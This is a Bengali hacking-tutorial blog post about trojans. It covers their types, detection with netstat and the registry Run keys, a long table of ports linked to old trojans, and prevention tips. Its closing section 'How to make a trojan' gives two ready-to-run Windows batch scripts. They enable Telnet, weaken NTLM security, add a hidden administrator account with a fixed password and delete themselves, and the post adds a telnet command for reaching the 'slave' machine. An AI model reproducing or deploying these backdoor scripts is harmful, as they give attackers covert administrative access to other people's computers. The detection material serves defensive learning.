ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

36
2642

কেমন আছেন সবাই ? আশা করি ভালো আছেন :D অনেকদিন পর লিখতে বসলাম । হুট করে কিছু ব্যাক্তিগত ব্যস্ততার কারনে এ  কদিন সময় দিতে পারি নাই । যাইহোক আবার চলে এসেছি । ইনশাআল্লাহ এখন থেকে আবার নিয়মিত লিখতে পারব :) আজ আমি লিখব ব্যাসিক  হ্যাকিং এর ৩য় পর্ব । আজ আপনাদের কে ট্রোজান  সম্পর্কে নুন্যতম প্রয়োজনীয় তথ্য গুলো জানাতে চেষ্টা করব :)

শুরুতেই আসুন জেনে নেই ট্রোজান কি ?

 

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

ট্রোজান সম্পর্কে উইকিপিডিয়া বলে

A Trojan horse, or Trojan, is a standalone malicious program that does not attempt to infect other computers in a completely automatic manner without help from outside forces like other programs and human intervention.

অর্থাৎ স্ব নির্ভর যে সব ক্ষতিকারক প্রোগ্রাম বাইরের কোন সাহায্য ছাড়া যেমন অন্যান্য প্রোগ্রাম এবং মানুষের হস্তক্ষেপ ছাড়া স্বয়ংক্রিয় ভাবে অন্য কম্পিউটার বা সিস্টেম কে আক্রান্ত করার চেষ্টা করে না তাদের কে ট্রোজান বা ট্রোজান হর্স বলে ।

সহজ ভাষা তে  একটি  বাস্তব ও বিশ্বাসযোগ্য [  trusted ]  প্রোগ্রাম এর ভেতর লুকিয়ে থাকা অনাকাঙ্ক্ষিত ও ক্ষতিকারক প্রোগ্রাম ট্রোজান । যেহেতু এটা অনাকাঙ্ক্ষিত , তাই এর গতিবিধি , কার্যপ্রণালী , কার্যপদ্ধতি , ব্যাপ্তি সবকিছুই ইউজার এর  নিকট অজানা থেকে যায় । কথা প্রসঙ্গে বলে রাখি অপারেটিং সিস্টেম এর  registry অন্তর্ভুক্ত না থাকা সব প্রোগ্রাম ই অনাকাঙ্ক্ষিত বলে সিস্টেম এর কাছে গণ্য হবে ।

 

ট্রোজান এর কার্যবিধি :

গ্রীক মিথ অনুযায়ী গ্রীক রা তাদের সৈন্য বাহিনী কে কতগুলো কাঠের তৈরি ঘোড়ার ভেতর ভরে সেই ঘোড়াগুলোকে ট্রয় বাসীদের উপহার দেয়। পরে যুদ্ধ শুরু হলে ওই সৈন্য গুলো ঘোড়া থেকে বের হয়ে  ট্রয় এর অভেদ্য দেয়াল এর ভেতর থেকে আক্রমন করে ট্রয় দখল করে নেয় ।  অখান থেকেই মুলত এধরনের প্রোগ্রাম কে ট্রোজান নাম দেওা হয় । একে  হ্যাকার রা ভালবেসে Mr. James  ও বলে থাকে এর গুপ্তচর বৃত্তীয় কাজে দক্ষতার জন্য !

ট্রোজান এর সৃষ্টিকর্তা বা ডিজাইনার এর ইচ্ছা অনুযায়ী ট্রোজান করতে পারে না এমন কোন কাজ নেই ! ! এটা ফাইল কপি , ডিলিট , পেস্ট , adware , malware , spyware প্রোগ্রাম ইন্সটল করা , ইন্টারনেট অ্যাক্সেস , প্রোগ্রাম রিমুভ সব ই করতে পারে ।

 

ট্রোজান এর ধরণ :

Remote Access Trojans:  এগুলো  ভিকটিম এর সিস্টেম এর আংশিক বা পুরপুরি দখল নিয়ে নিতে পারে ।  একটা সার্ভার অ্যাপ্লিকেশান এর মাধ্যমে  ভিকটিম এর পিসি হতে সব ধরনের আনুচরন করা হয় হ্যাকার এর পিসি থেকে । সিস্টেম স্টার্ট করার সাথে সাথে এটা এর  ক্লায়েন্ট সিস্টেম [ হ্যাকার এর সিস্টেম ] এর সাথে একটা নির্দিষ্ট পোর্ট এর মাধ্যমে নিরাপদ সংযোগ স্থাপন করে । এর পর ক্লায়েন্ট সিস্টেম থেকে যা ইচ্ছা করা যায়  ভিকটিম এর সিস্টেম এ । বেশীর ভাগ ট্রোজান এ ধরনের। 

Data Sending Trojans:  একটা ইমেইল বা ব্যাকডোর এর মাধ্যমে   ভিকটিম এর সিস্টেম হতে কী – লগ , পাসওয়ার্ড , কুকি  ক্লায়েন্ট সিস্টেম এ ফিড করে ।

Destructive Trojans : দুটো   উদ্দেশ্য এ ধরনের ট্রোজান ব্যবহার করা হয়ে থাকে । (এক) ধ্বংসাত্মক উদ্দেশ্য – সিস্টেম ক্র্যাশ , অপারেটিং সিস্টেম কে করাপ্ট করা বা উরাধুরা র‍্যানডম ফাইল ডিলিট করা । ( দুই ) সিরিয়াস   উদ্দেশ্য – আপনার পিসি আর হ্যাকার এর ভেতর সব থেকে বড় বাধা হচ্ছে আপনার সিস্টেম এর ফায়ারওয়াল বা অ্যান্টিভাইরাস । আপনার পিসি কে নিজের বাগান এর মত বানিয়ে নিতে হ্যাকার রা এ ধরনের ট্রোজান বানায় । এটা এমন ভাবে প্রোগ্রাম করা হয় যে এ আপনার সিস্টেম এ এশে বসতি গাড়বে আপনারই সাধের ফায়ার ওয়াল বা অ্যান্টিভাইরাস এর উপর এগুলোর  সিক্যুরিটি কে আংশিক বা পুরপুরি ডিসঅ্যাবেল করে । হয়ত আপনার কাছে সবকিছুই আপাত ও ঠিকঠাক লাগবে কিন্তু কিছুই ঠিক নেই :( 

DDos Attack Trojans: একটা সার্ভার এর সাথে সংযুক্ত সন গুলো সিস্টেম [ ল্যান নেটওয়ার্ক ] বা সিস্টেম কে ধসিয়ে দেবার জন্য এর কোন তুলনা ও নেই , উত্তর ও নেই , প্রতিরধ ও নেই । এরা অপরাজেয় ! এটা  প্রথমে সার্ভার  এর ও এর সাথে সংযুক্ত সবগুলো সিস্টেম গুলো কে আক্রমন করে আক্রান্ত বা ইনফ্যাক্টেড করে  ফেলে এবং এগুলো কে স্ট্যান্ডবাই করে রাখে । এর পর  হঠাৎ করে সবগুলো সিস্টেম এ এবং সিস্টেম গুলো থেকে সার্ভার এ একসাথে অগুনতি সিস্টেম কমান্ড দিতে থাকে । সিস্টেম এর কার্যকরী ক্ষমতার বাইরে যখনই কমান্ড এর সংখ্যা চলে যাবে তখন এ সার্ভার ও এর সাথে সংযুক্ত সবগুলো সিস্টেম একসাথে  ক্র্যাশ করবে এবং অকারজকরি হয়ে  যাবে ।

Proxy Trojans :  হ্যাকার দের পরিচয় গোপন করাই এটার  উদ্দেশ্য। মনে করুন আপনার সিস্টেম কে আমি আক্রমন করব । সে জন্য আপনার পিসি এর পরিচয় আমাকে পেতে হবে । আমি আমার  কম্যান্ড প্রম্পট থেকে সহজেই টা পেতে পারি । কিন্তু সে জন্য আমাকে আমার নিজের পরিচয় ও দিতে হবে । এখানে পরিচ্য শব্দ টা ব্যাবহার করা হচ্ছে পোর্ট  আইডেনটিটি , আই পি , ম্যাক সব এ অন্তর্ভুক্ত । শুধু এটা লুকানর জন্যই এধরেন ট্রোজান ব্যাবহার করা হয় । এটা দ্বারা আমি অন্য একটা স্লেভ সিস্টেম ব্যাবহার করে আপনার পরিচয় নিতে পারব এবং সেক্ষেত্রে আপনি ব্যাক ট্র্যাক করলেও স্লেভ সিস্টেম এর পরিচয় পাবেন , আমার টা না !

Security Software Disabler Trojan : এটার নামেই পরিচয় । সিস্টেম কে আক্রমন করে এদের কাজ হচ্ছে সিস্টেম এর ডিফল্ট না এমন সব সিক্যুরিটি অ্যাপ্লিকেশান এবং সফটওয়্যার গুলো কে ডিজঅ্যাবেল করে পরবর্তী আক্রমনের জন্য আদর্শ পরিবেশ তৈরি করে দেওয়া । এদের কে রেকি ট্রোজান ও বলে থাকে ।

 

 

কিভাবে বুঝবেন আপনি আক্রান্ত কিনা [ সনাক্তিকরন ] 

 

ট্রোজান এর সবথেকে বড় সনাক্তিকরন পদ্ধতি হচ্ছে এটা যে কোন অবস্থা তেই নেটওয়ার্ক  অ্যাডাপটার এর সাথে একটা  নির্দিষ্ট পোর্ট এর মাধ্যমে লিসেনার পোস্ট বা হ্যাকার এর সিস্টেম এ ডাটা ফিড করে । হালনাগাদ অ্যান্টিভাইরাস অথবা অ্যান্টি স্পাই ও্যায়ার ,অ্যান্টি ম্যাল ও্যায়ার  এগুলো থাকলে খুব সহজেই আপনি জানতে পারবেন আপনি ট্রোজান আক্রান্ত কিনা । শুধু তাই না আপনি সেগুল রিমুভ ও করতে পারবেন । তবে এগুলো ছাড়া ও আপনি বুঝতে পারবেন আপনি আক্রান্ত কিনা । তবে ব্যক্তিগত ভাবে আমি বলব আপনারা নিজে নিজেই ট্রোজান টি খুজে বের করার চেষ্টা করুন । কারন অনেক সময় ই ট্রোজান গুলো FUD / Fully Un-Detectable  হয় । অর্থাৎ খুব হালনাগাদ অ্যান্টিভাইরাস ও এর অস্তিত্ব সম্পর্কে কিছুই বলতে পারে না ! নিজে কিভাবে খুজে বের করবেন তার পদ্ধতি আমি আপনাদের কে এখন বলব :)

১) প্রথমেই  RUN  থেকে  কমান্ড প্রম্পট বা  CMD  ওপেন করুন নিচের চিত্রের মত করে

 

ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

 

২) কমান্ড প্রম্পট ওপেন হলে netstat -a লিখে এন্টার দিন ।এতে করে আপনার সিস্টেম এর সচল সবগুলো পোর্ট কানেকশন , লোকাল , ফরেন অ্যাড্রেস ও এর অবস্থা  সম্পর্কিত একটা তালিকা প্রদর্শন করবে CMD ।

ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

৩) একটু অপেক্ষা করুন ।এবার netstat -a লিখে কমান্ড দিন এমং এন্টার চাপুন এবার আপনার সিস্টেম এর সবগুলো পোর্ট কে প্রদর্শন করাবে CMD  নিচের চিত্রের মত করে

ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

 

৪) Local Address  এর নিচে যত গুলো এন্ট্রি দেখতে পাবেন তার সবগুলোর শেষে  ‘:’  এই চিহ্নের পর যে সংখ্যা থাকবে ওটাই হচ্ছে ওই  কানেকশন এর লোকাল পোর্ট ।  চিত্রের নিচে লক্ষ্য করুন একটা লিস্ট দেওয়া আছে । যেখানে পরিচিত সব ট্রোজান গুলো কোন কোন পোর্ট ব্যবহার করে তার পূর্ণ তালিকা করা হয়েছে । ওখান থেকে আপনার CMD  থেকে প্রাপ্ত লিস্ট এর সাথে মিলিয়ে দেখুন । যদি দেখেন কোন পোর্ট মিলে গেছে তাহলে  নিচের চিত্রের মত করে আবার কমান্ড প্রম্পট এ লিখুন  netstat -aon এবং এন্টার চাপুন

ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

পোর্ট ট্রোজান এর নাম
1 (UDP) Sockets des Troie
2 Death
20 Senna Spy FTP server
21 Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash
22 Shaft
23 Fire HacKer, Tiny Telnet Server – TTS, Truva Atl
25 Ajan, Antigen, Barok, Email Password Sender – EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
30 Agent 40421
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat, Foreplay
48 DRAT
50 DRAT
58 DMSetup
59 DMSetup
79 CDK, Firehotcker
80 711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader
81 RemoConChubo
99 Hidden Port, NCX
110 ProMail trojan
113 Invisible Identd Deamon, Kazimas
119 Happy99
121 Attack Bot, God Message, JammerKillah
123 Net Controller
133 Farnaz
137 Chode
137 (UDP) Msinit
138 Chode
139 Chode, God Message worm, Msinit, Netlog, Network, Qaz
142 NetTaxi
146 Infector
146 (UDP) Infector
170 A-trojan
334 Backage
411 Backage
420 Breach, Incognito
451 TCP Wrappers trojan
455 Fatal Connections
456 Hackers Paradise
513 Hackers Paradise
555 RPC Backdoor
605 Net666, Rasmin
666 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy
667 Secret Service
669 Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door – SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)
692 SniperNet
777 DP trojan
808 GayOL
911 AimSpy, Undetected
999 WinHole
1000 Dark Shadow
1001 Deep Throat, Foreplay, WinSatan
1010 Der Späher / Der Spaeher, Direct Connection
1011 Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx
1012 Doly Trojan
1015 Doly Trojan
1016 Doly Trojan
1020 Doly Trojan
1024 Doly Trojan
1025 Vampire
1025 (UDP) Jade, Latinus, NetSpy
1035 Remote Storm
1042 Remote Storm
1045 Multidropper
1049 BLA trojan
1050 Rasmin
1053 /sbin/initd
1054 MiniCommand
1080 The Thief
1081 AckCmd
1082 WinHole
1083 WinHole
1090 WinHole
1095 WinHole
1097 Xtreme
1098 Remote Administration Tool – RAT
1099 Remote Administration Tool – RAT
1150 Remote Administration Tool – RAT
1151 Blood Fest Evolution, Remote Administration Tool – RAT
1170 Orion
1200 (UDP) Orion
1201 (UDP) Psyber Stream Server – PSS, Streaming Audio Server, Voice
1207 NoBackO
1208 NoBackO
1212 SoftWAR
1234 Infector
1243 Kaos
1245 SubSeven Java client, Ultors Trojan
1255 BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles
1256 VooDoo Doll
1269 Scarab
1272 Project nEXT
1313 Matrix
1338 The Matrix
1349 The Matrix
1394 Millenium Worm
1441 Bo dll
1492 GoFriller, Backdoor G-1
1524 Remote Storm
1568 FTP99CMP
1600 Trinoo
1703 Remote Hack
1777 Direct Connection, Shivka-Burka
1807 Exploiter
1966 Scarab
1967 SpySender
1969 Fake FTP
1981 WM FTP Server
1999 OpC BO
2000 টBowl,Shockrave
2001 Back Door, SubSeven, TransScout
2023 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator
2080 Der Späher / Der Spaeher, Trojan Cow
2115 Ripper Pro
2130(UDP) WinHole
2140 Bugs
2140(UDP) Mini Backlash
2155 The Invasor
2255 Deep Throat,Foreplay
2283 Illusion Mailer
2300 Nirvana
2311 Hvl RAT
2330 Xplorer
2331 Studio 54
2332 Contact
2333 Contact
2334 Contact
2335 Contact
2336 Contact
2337 Contact
2338 Contact
2339 Contact, Voice Spy
2339(UDP) Contact
2345 Contact, Voice Spy
2565 Voice Spy
2583 Doly Trojan
2600 Striker trojan
2716 WinCrash
2773 Digital RootBeer
2774 The Prayer
2801 SubSeven, SubSeven 2.1 Gold
2989(UDP) SubSeven, SubSeven 2.1 Gold
3000 Phineas Phucker
3024 Phineas Phucker
3031 Remote Shut
3128 WinCrash
3129 Microspy
3150 Reverse WWW Tunnel Backdoor, RingZero
3150(UDP) Masters Paradise
3456 The Invasor
3459 Deep Throat,Foreplay,Mini Backlash
3700 Terror trojan
3777 Eclipse 2000,Sanctuary
3791 Portal of Doom
3801 PsychWard
4000 Total Solar Eclypse
4092 Total Solar Eclypse
4242 SkyDance
4321 WinCrash
4444 Virtual Hacking Machine -VHM
4567 BoBo
4590 Prosiak, Swift Remote
4950 File Nail
5000 ICQ Trojan
5001 ICQ Trogen (Lm)
5002 Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie
5010 Back Door Setup, Sockets des Troie
5011 cd00r, Shaft
5025 Solo
5031 One of the Last Trojans – OOTLT, One of the Last Trojans – OOTLT, modified
5032 WM Remote KeyLogger
5321 Net Metropolitan
5333 Net Metropolitan
5343 Firehotcker
5400 Backage, NetDemon
5401 wCrat – WC Remote Administration Tool
5402 Back Construction, Blade Runner
5512 Back Construction, Blade Runner
5534 Back Construction, Blade Runner
5550 Illusion Mailer
5555 Xtcp
5556 ServeMe
5557 BO Facil
5569 BO Facil
5637 Robo – Hack
5638 PC Crasher
5742 PC Crasher
5760 WinCrash
5880 Portmap Remote Root Linux Exploit
5882 Y3K RAT
5882 Y3K RAT
5882 (UDP) Y3K RAT
5888 Y3K RAT
5889 Y3K RAT
5889 Y3K RAT
6000 The Thing
6000 Bad Blood
6000 Secret Service
6000 The Thing
6661 TEMan, Weia-Meia
6666 Dark Connection Inside, NetBus worm
6667 Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan
6669 Host Control, Vampire
6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame
6711 BackDoor-G, SubSeven, VP Killer
6710 Funny trojan, SubSeven
6713 SubSeven
6723 Mstream
6771 Deep Throat, Foreplay
6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer
6838 (UDP) Mstream
6883 Delta Source DarkStar (??)
6912 Shit Heep
6939 Indoctrination
6969 GateCrasher, IRC 3, Net Controller, Priority
6970 GateCrasher
7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold
7001 Freak88, Freak2k
7215 SubSeven, SubSeven 2.1 Gold
7300 NetMonitor
7301 NetMonitor
7306 NetMonitor
7307 NetMonitor
7308 NetMonitor
7424 Host Control
7424 (UDP) Host Control
7597 Qaz
7626 Glacier
7777 God Message, Tini
7789 Back Door Setup, ICKiller
7891 The ReVeNgEr
7983 Mstream
8080 Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero
8787 Back Orifice 2000
8988 BacHack
8989 Rcon, Recon, Xcon
9000 Netministrator
9325 (UDP) Mstream
9400 InCommand
9872 Portal of Doom
9873 Portal of Doom
9874 Portal of Doom
9875 Portal of Doom
9876 Cyber Attacker, Rux
9878 TransScout
9989 Ini-Killer
9999 The Prayer
10000 OpwinTRojan
10005 OpwinTRojan
10067 (UDP) OpwinTRojan
10085 Syphillis
10086 Syphillis
10100 Control Total, Gift trojan
10101 BrainSpy, Silencer
10167 (UDP) Portal of Doom
10520 Acid Shivers
10528 Host Control
10607 Coma
10666 (UDP) Ambush
11000 Senna Spy Trojan Generator
11050 Host Control
11051  Host Control
11223 Progenic trojan, Secret Agent
12076 Gjamer
12345 Hack´99 KeyLogger
12346 Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack Job, X-bill
12349 Fat Bitch trojan, GabanBus, NetBus, X-bill
12361 BioNet
12362 Whack-a-mole
12363 Whack-a-mole
12623 (UDP) Whack-a-mole
12624 DUN Control
12631 ButtMan
12754 Whack Job
13000 Mstream
13010 Senna Spy Trojan Generator, Senna Spy Trojan Generator
13013 Hacker Brasil – HBR
13014 PsychWard
13223 PsychWard
13473 Hack´99 KeyLogger
14500 Chupacabra
14501 PC Invader
14502 PC Invader
14503 PC Invader
15000 PC Invader
15092 NetDemon
15104 Host Control
15382 Mstream
15858 SubZero
16484 CDK
16660 Mosucker
16772 Sracheldraht
16959 ICQ Revenge
16969 SubSeven, Subseven 2.1.4 DefCon 8
17166 Priority
17300 Mosaic
17449 Kuang2 the virus
17500 Kid Terror
17569 CrazzyNet
17593 CrazzyNet
17777 Infector
18753 (UDP) Audiodoor
19864 Nephron
20000 ICQ Revenge
20001 Millenium
20002  Millenium, Millenium (Lm)
20005 AcidkoR
20023 Mosucker
20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job
20203 Chupacabra
20331 BLA trojan
20432 Shaft
20433 (UDP) Shaft
21544 GirlFriend, Kid Terror
21554 Exploiter, Kid Terror, Schwindler, Winsp00fer
22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K
23005 NetTrash
23006 NetTrash
23023 Logged
23030 Amanda
23432 Asylum
23456 Evil FTP, Ugly FTP, Whack Job
23476 Donald Dick
23476 (UDP) Donald Dick
23477 Donald Dick
23777 InetSpy
24000 Infector
25685 Moonpie
25686 Moonpie
25982 Moonpie
26274 (UDP) Delta Source
26681 Voice Spy
27374 Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader
27444 (UDP) Trinoo
27573 SubSeven
27665 Trinoo
28678 Exploiter
29104 NetTrojan
29363 ovasOn
29891 The Unexplained
30000 Infector
30001 ErrOr32
30003 Lamers Death
30029 AOL trojan
30100 NetSphere
30101 NetSphere
30102 NetSphere
30103 NetSphere
30103 (UDP) NetSphere
30133 NetSphere
30303 Sockets des Troie
30947 Intruse
30999 Trinoo
31335 Bo Whack, Butt Funnel
31336 Back Fire, Back Orifice 1.20 patches, Back Orifice (Lm), Back Orifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp_pipe.c, Sockdmini
31337 Back Orifice, Deep BO
31337 (UDP) Back Orifice, Butt Funnel, NetSpy (DK)
31338 BOWhack
31338 (UDP) Hack´a´Tack
31787 Hack´a´Tack
31788 Hack´a´Tack
31789 (UDP) Hack´a´Tack
31790 Hack´a´Tack
31791 (UDP) Hack´a´Tack
31792 Hack´a´Tack
32001 Donald Dick
32100 Peanut Brittle, Project nEXT
32418 Acid Battery
33270 Trinity
33333 Blakharaz, Prosiak
33577 Son of PsychWard
33777 Son of PsychWard
33911 Spirit 2000, Spirit 2001
34324 Big Gluck, TN
34444 Donald Dick
34555 (UDP) Trinoo (for Windows)
35555 (UDP) Trinoo (for Windows)
37237 Mantis
37651 Yet Another Trojan – YAT
40412 The Spy
40421 Agent 40421, Masters Paradise
40422 Masters Paradise
40423 Masters Paradise
40425 Masters Paradise
40426 Masters Paradise
41337 Storm
41666 Remote Boot Tool – RBT, Remote Boot Tool – RBT
44444 Prosiak
44575 Exploiter
47262 (UDP) Delta Source
49301 OnLine KeyLogger
50130 Enterprise
50505 Sockes des Troie
50766 Fore, Schwindler
51966 Cafeini
52317 Acid Battery
53001 Remote Windows Shutdown – RWS
54283 SubSeven, SubSeven 2.1 Gold
54320 Back Orifice 2000
54321 Back Orifice 2000, School Bus
55165 File Manager trojan, File Manager trojan, WM Trojan Generator
55166 WM Trojan Generator
57341 NetRaider
58339 Butt Funnel
60000 Deep Throat, Foreplay, Sockets des Troie
60001 Trinity
60068 Xzip 6000068
60411 Connection
61348 Bunker – Hill
61466 TeleCommando
61603 Bunker – Hill
63485 Bunker – Hill
64101 Taskman
65000 Devil, Sockets des Troie, Stacheldraht
65390 Eclypse
65421 Jade
65432 The Traitor (= th3tr41t0r)
65432 (UDP) The Traitor (= th3tr41t0r)
65534 /sbin/initd
65535 RC1 trojan

 

৪) এবার উপরের প্রথম ছবি তে লক্ষ্য করুন একেবারে ডান পাশে PID  আছে ।   এটা হচ্ছে Process ID । যে পোর্ট টা মিলে গেছে সেটার পোর্ট নাম্বার এর PID  খুজে বের করুন । এবার Windows Task Manager  বের করুন এবং Services  ট্যাব টি তে ক্লিক করুন নিচের চিত্রের মত  । মাঝের সারিতে  দেওয়া  PID  এর সাথে মিলিয়ে দেখুন প্রসেস নাম ও এর বর্ণনা [ description ]। নাম টা উপরে দেওয়া তালিকার সাথে মিলে যায় যদি তাহলে নিশ্চিত থাকুন আপনি ট্রোজান আক্রান্ত :(

ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

 

 

উপরের পদ্ধতি ছাড়াও আপনি রেজিস্ট্রি এর মাধ্যমে বের করতে পারেন ট্রোজান আক্রান্ত কিনা আপনি । সব ট্রোজান ই auto – startup  এর আদলে নির্মিত । অর্থাৎ উইন্ডোজ ওপেন হলে এরাও ওপেন হয়ে যায় । তাই আপনি রেজিস্ট্রি থেকে খুব সহজেই দেখতে পারেন কোন কোন প্রোগ্রাম গুলো স্টার্ট আপ এর সাথে রান করে । যদি রেজিস্ট্রি তে যেতে চান তাহলে কমান্ড প্রম্পট থেকে Regedit লিখে এন্টার চাপুন ।   আমি নিচে সবগুলো অটো রান এর ডিরেক্টরি দিয়ে দিচ্ছি । আপনি যদি এভাবে খুজে বের করতে চান ট্রোজান এর অস্তিত্ব, তাহলে প্রত্যেকটি ডিরেক্টরি তে যেয়ে দেখুন Trojan.exe বা trojan.exe নামের কোন প্রোগ্রাম আছে কিনা । থাকলে নিশ্ছিত থাকুন আপনি ট্রোজান আক্রান্ত ।

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

 

 

ট্রোজান থেকে বাঁচার উপায়  :

১)ভালো মানের হালনাগাদ অ্যান্টিভাইরাস
২)অ্যান্টি স্পাইওয়্যার
৩)অ্যান্টি ফিশিং ওয়্যার
৪) রেজিট্রি ক্লিনার
৫) অ্যাড ব্লকার
৬) স্প্যাম রিমুভার

কিভাবে ট্রোজান বানাবেন ? :P :P :P

আমি খুব সহজ একটা ট্রোজান বানানো শিখিয়ে দিচ্ছি । এর জন্য দরকার শুধু এটা নোটপ্যাড ।

উইন্ডোজ এক্সপি এর জন্য ট্রোজান বানাতে হলে notepad ওপেন করুন এবং তাতে নিচের কোড টা কপি পেস্ট করুন এবং যেকোনো নাম দিয়ে .bat এক্সটেন্সান হিসেবে সেভ করুন ।

@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage/add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00
del trojan.bat

এখানে খেয়াল করুন উপরের কোড এ
১ম লাইন টা কমান্ড থেকে ইকো বন্ধ করে দিবে।
২য় লাইন টা প্রতিবার স্টার্টআপ এর সাথে সাথে সিস্টেম কে বলবে Telnet server কে স্টার্ট করতে।
৩য় লাইন টা সিস্টেম কে current windows NT systems এর জন্য Telnet server কে স্টার্ট করতে বলবে ।
৪র্থ লাইন টা পাসওয়ার্ড ফাইল এর NTLM hash security কে বন্ধ করে দিবে ।
৫ম লাইন টা Telnet server এর জন্য stream mode চালু করবে ও সংযোগ স্থাপন করবে ।
৬ষ্ঠ ও ৭ম লাইন দুটো tunerpage নামের একজন ইউজার তৈরি করবে যার পাসওয়ার্ড 12345 ।
৮ম লাইন টি tunerpage নামের ইউজারটিকে Administrator বানিয়ে দিবে ।
৯ম লাইন টি tunerpage নামের একজন ইউজার এর সব ডাটা লুকিয়ে রাখবে ।
১০ম লাইন টি পুরো ব্যাট ফাইল টিকে মুছে ফেলবে ।

উইন্ডোজ ৭ এং ভিস্তার জন্য ট্রোজান বানাতে হলে নিচের কোড টা কপি করে নোটপ্যাড এ পেস্ট করুন এবং যেকোনো নাম দিয়ে .bat এক্সটেন্সান হিসেবে সেভ করুন ।

@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage /add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00

একবার ইন্সটল হয়ে গেলে বা ট্রোজান টি স্লেভ কম্পিউটার এ নিজেকে স্থাপন করে ফেললে Telnet Client আছে এমন যেকোনো সার্ভার থেকে নিচের কোড এর  মাধ্যমে স্লেভ কম্পিউটার এ অ্যাক্সেস করতে পারবেন । শুধু  slave’s IP address এর জায়গা তে  স্লেভ এর আসল আই পি দিলেই কাজ হবে :D

C:\>telnet<slave’s IP address>

বিশেষ দ্রষ্টব্য : উপরের কোডিং টা খুব ই নিম্ন মানের এবং আদিম কালের ট্রোজান । এটা যেকোনো অ্যান্টিভাইরাস এর কাছে ধরা খাবে :P তারপর ও বলি , এই  কোডিং দেওয়ার উদ্দেশ্য শুধুই শেখার জন্য । আপনি যদি কারো ক্ষতি করার উদ্দেশে এটা ব্যবহার করতে চান তাহলে দয়া করে নিজ  দায়িত্বে করবেন । আমাকে বা টিউনার পেজ কে কোনভাবেই দায়ী  করা যাবে না :) 

 

মোটামুটি এই ছিল ট্রোজান নিয়ে বিস্তারিত আলোচনা । আশা করি আপনারা নতুন কিছু শিখতে পেরেছেন । যদি টা হয় অথবা যদি আপনাদের ভালো লেগে থাকে দয়া করে কমেন্ট করে জানাবেন । আর আপনাদের ও যদি কিছু জানতে ইচ্ছা হয়  কমেন্ট এ বলবেন । ইনশাআল্লাহ আমি টিউন করার চেষ্টা করব । আগামী টিউন এর জন্য অপেক্ষায় থাকুন । সে পর্যন্ত সবাই সুস্থ থাকুন , ভালো থাকুন । আল্লাহ হাফেয :)

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

36 মন্তব্য

